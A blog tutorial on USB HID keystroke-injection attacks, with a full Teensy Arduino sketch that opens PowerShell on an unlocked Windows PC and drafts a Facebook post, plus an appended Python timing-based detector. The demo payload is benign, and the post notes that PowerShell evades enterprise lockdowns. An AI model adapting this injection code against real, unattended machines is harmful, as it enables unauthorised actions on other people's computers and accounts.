May 24, 2018

USB HID attack – A zero to hero guide

(Last Updated On: 20th September 2016)

I’ve had a Teensy USB 3.2 Arduino board for around a year now with the intention of playing with some USB HID attacks, and creating this blog has finally motivated me to do it. Hurrah for the blog. If you haven’t heard or seen anything about USB HID attacks, they are a pretty neat little attack vector that leverages the fact that computers will automatically permit new keyboards. They abuse this trust by loading a small computer (often designed to look like a USB drive) with malicious code that, when plugged into an unlocked computer, will unleash pre-programmed keystrokes. With a small amount of feedback coming from the virtual LEDs (num lock, caps lock and scroll lock) the code can even react to different conditions and environments and change the simulated key presses. Cool stuff!

This guide will walk you through turning an out-of-the-box TeensyUSB into a Facebook attack tool that, when plugged into an unlocked PC with an open Facebook session (not necessarily an open browser, as long as the user hasn’t logged out of Facebook when closing the browser), will create a malicious post. So grab yourself a TeensyUSB and let’s get going. I’ll also be doing a similar guide for the Raspberry Pi Zero when I get round to ordering one, as it’s a little cheaper but more complicated for an application like this. If you can’t be bothered with any of the complexity, get yourself a USB Rubber Ducky as seen on Mr. Robot.

Step 1, let’s install some stuff.

First you need to download the Arduino software here and the TeensyUSB software from here. Install the Arduino software first, and then install the Teensyduino software so it installs into the same location. You should be able to keep everything as default for the installs, but it’s worth checking the Teensyduino install to make sure all libraries are installed, as in the screenshot below.

[Screenshot: Teensyduino installer with all libraries selected]

[Screenshot: Windows installing the device drivers]

With our software installed, connect your TeensyUSB to your PC (I’m using Windows 10) and wait for the device drivers to install. If they aren’t installing, try pressing the little button on the board, but it should just work. The default software flashes the LED so you know it’s on. Note that the LED flashes even when the drivers have not loaded successfully.

When your drivers have installed, open the Arduino software from the Desktop icon or from the start menu.

Step 2, programming the TeensyUSB.

The code at the bottom of this article can simply be copied in as is, but it’s worth knowing what it is doing. With this code the device will do nothing when initially plugged in until the user turns on num lock (as it’s for showing, not doing malicious stuff!). When they / you press that num lock key the script breaks out of the loop that’s holding it back and begins the payload, which uses PowerShell to launch a browser (with the target set to Facebook) and prepare a status update.

To program the TeensyUSB, simply paste this code into the window you just opened and click the right arrow (the second icon on the toolbar) to program your device. The screenshots below give you an idea of what we are looking for.

[Screenshot: the Arduino IDE with the sketch pasted in]

[Screenshot: the Teensy programmer window]

Clicking this button should (after a few seconds’ delay) open a new window which will probably automatically program your TeensyUSB device. If it does not, press the little button on your device to put it into programming mode.

That’s it, hit the num lock key now and you should find that a browser opens to Facebook and prepares a status update for you, stopping just short of posting it!

You will notice that it uses the mobile Facebook experience, and that’s because we need a static number of tab key presses to get to the status update box (12, as it happens, for Chrome; change the script if the target is using IE or Firefox) and the desktop experience requires you to tab through a list of groups which is of a dynamic length. You may also notice it uses PowerShell to launch the browser rather than the run command. Seems overkill, right? Wrong! The average home user may have the run command enabled, but any enterprise with a proactive IT department will have blocked access to the run command (Windows Key + R) and cmd.exe. PowerShell, though, is on every Windows OS since Windows 7 and I haven’t seen it locked down yet :D.

Cool huh? Program your board, plug it into the target and turn on num lock to show the demo.

Code below, enjoy!

  // TeensyUSB HID demo sketch. In the Arduino IDE, Tools > USB Type must include
  // Keyboard (e.g. "Keyboard + Mouse + Joystick"), otherwise the Keyboard object
  // and the keyboard_leds variable are not compiled in.

  #define modifierKeyReleaseDelay 50   // ms to hold a modifier combination before releasing
  #define sendKeyReleaseDelay 50       // ms to hold a single key before releasing
  #define ledPin 13                    // on-board LED
  #define tabsToFBPost_Chrome 12       // tab presses from page load to the status box in Chrome
  #define tabsToFBPost_IE 19           // same count for Internet Explorer (not used by payload())

  void setup() {
    pinMode(ledPin, OUTPUT);
  }

  // Press and release a modifier key on its own (not used by the payload, kept for reuse)
  void sendModifier(int key)
  {
    Keyboard.set_modifier(key);
    Keyboard.send_now();
    delay(modifierKeyReleaseDelay);
    Keyboard.set_modifier(0);
    Keyboard.send_now();
  }

  // Shift+F10 opens the context menu of the focused item, like a right click
  void rightClick()
  {
    Keyboard.set_modifier(MODIFIERKEY_SHIFT);
    Keyboard.set_key1(KEY_F10);
    Keyboard.send_now();
    delay(modifierKeyReleaseDelay);
    Keyboard.set_key1(0);
    Keyboard.set_modifier(0);
    Keyboard.send_now();
    delay(50); // Give it chance!
  }

  // Ctrl+Space toggles the selection of the focused item
  void unSelectObject()
  {
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_SPACE);
    Keyboard.send_now();
    delay(modifierKeyReleaseDelay);
    Keyboard.set_key1(0);
    Keyboard.set_modifier(0);
    Keyboard.send_now();
    delay(50); // Give it chance!
  }

  // Press and release a single key numberOfTimes times (one key roughly every 100 ms)
  void sendKey(int key, int numberOfTimes)
  {
    for (int i = 0; i < numberOfTimes; i++) {
      Keyboard.set_key1(key);
      Keyboard.send_now();
      delay(sendKeyReleaseDelay);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(50);
    }
  }

  // Win+M minimises all windows and leaves the desktop focused. Requires sendKey and unSelectObject.
  void goToDesktop()
  {
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.set_key1(KEY_M);
    Keyboard.send_now();
    delay(50);
    Keyboard.set_key1(0);
    Keyboard.set_modifier(0);
    Keyboard.send_now();
    delay(100);            // Give it chance to minimise windows
    sendKey(KEY_RIGHT, 1); // Move focus onto a desktop icon
    unSelectObject();      // Deselect it again so nothing is selected
  }

  // Bit 0 of the LED report the host sends to the keyboard is Num Lock
  bool isNumLockOn()
  {
    return keyboard_leds & 1;
  }

  void blink()
  {
    digitalWrite(ledPin, HIGH);
    delay(200);
    digitalWrite(ledPin, LOW);
  }

  // Create a desktop shortcut to cmd via the context menu (New > Shortcut) and open it.
  // Requires sendKey and goToDesktop.
  void cmdViaShortcut(String cmd, String shortcutName)
  {
    goToDesktop();
    rightClick();
    sendKey(KEY_W, 1);           // "New" submenu
    sendKey(KEY_W, 1);
    sendKey(KEY_RIGHT, 1);
    sendKey(KEY_S, 1);           // "Shortcut"
    sendKey(KEY_ENTER, 1);
    delay(500);                  // Wait for the new shortcut window to open
    Keyboard.print(cmd);         // Target of the shortcut
    sendKey(KEY_ENTER, 1);
    Keyboard.print(shortcutName);
    sendKey(KEY_ENTER, 1);
    delay(500);                  // Wait for the shortcut to be created
    goToDesktop();
    Keyboard.print(shortcutName); // Typing the name selects the new icon
    delay(100);                  // Wait for explorer to catch up
    sendKey(KEY_ENTER, 1);       // Open it
  }

  void payload()
  {
    cmdViaShortcut("PowerShell.exe", "SimonsShortcut");
    delay(3000); // Give PowerShell chance to initialise
    Keyboard.print("& explorer 'http://m.facebook.com'"); // Opens the URL in the default browser
    sendKey(KEY_ENTER, 1);
    delay(2000); // Give the browser chance to open
    sendKey(KEY_TAB, tabsToFBPost_Chrome); // The status box is the 12th tab stop in Chrome
    Keyboard.print("Simon has just given me a really effective lesson on the dangers of the TeensyUSB HID attack!");
  }

  void loop() {
    while (!isNumLockOn()) // Do nothing until the user turns num lock on
      delay(50);
    blink();
    payload();
    while (true); // Tarpit - never run the payload a second time
  }
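As a defender’s counterpart to the sketch above, here is an added example (not part of the original post) that applies a keystroke-timing heuristic: sendKey() in the sketch releases one key roughly every 100 ms and Keyboard.print() types at USB speed, so a burst of a dozen or more keys with a sub-human mean gap or near-constant spacing is flagged. The thresholds, the sample timelines and the 2 ms per character figure assumed for Keyboard.print() are constructed for the demo, not measurements.

```python
import random
import statistics

# Thresholds are assumptions chosen for this demo, not published constants.
MIN_KEYS = 12           # the sketch sends 12 tabs before typing the post
MAX_MEAN_GAP_MS = 120   # sendKey() in the sketch yields roughly one key per 100 ms
MAX_CV = 0.15           # coefficient of variation; humans rarely space keys this evenly
IDLE_SPLIT_MS = 1000    # a pause this long ends a burst (the sketch idles 2-3 s between stages)

def split_bursts(timestamps_ms):
    """Group key-down timestamps into bursts separated by idle gaps."""
    bursts = [[]]
    for t in sorted(timestamps_ms):
        if bursts[-1] and t - bursts[-1][-1] > IDLE_SPLIT_MS:
            bursts.append([])
        bursts[-1].append(t)
    return [b for b in bursts if b]

def analyse(timestamps_ms):
    """Per burst: (start_ms, count, mean_gap_ms, cv, suspicious); long, fast or regular bursts are suspicious."""
    results = []
    for b in split_bursts(timestamps_ms):
        if len(b) < 2:
            continue
        gaps = [b[i + 1] - b[i] for i in range(len(b) - 1)]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        flag = len(b) >= MIN_KEYS and (mean <= MAX_MEAN_GAP_MS or cv <= MAX_CV)
        results.append((b[0], len(b), mean, cv, flag))
    return results

def injected_sample(start_ms=0.0, tabs=12, text_len=30):
    """Constructed timeline modelled on the sketch: tabs from sendKey() 100 ms apart,
    then Keyboard.print() characters at an assumed 2 ms each."""
    out, t = [], start_ms
    for gap, n in ((100, tabs), (2, text_len)):
        for _ in range(n):
            out.append(t)
            t += gap
    return out

def human_sample(start_ms=0.0, keys=40, seed=1):
    """Constructed human-like timeline: 120-450 ms between keys, jittered."""
    rng, out, t = random.Random(seed), [], start_ms
    for _ in range(keys):
        out.append(t)
        t += rng.uniform(120, 450)
    return out
```

Feed analyse() real key-down timestamps from a keyboard hook to use it outside the demo; the constants are a starting point to tune against your own users’ typing.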

Simon is a sysadmin for Local Government in North Yorkshire with a real passion for security and coding.
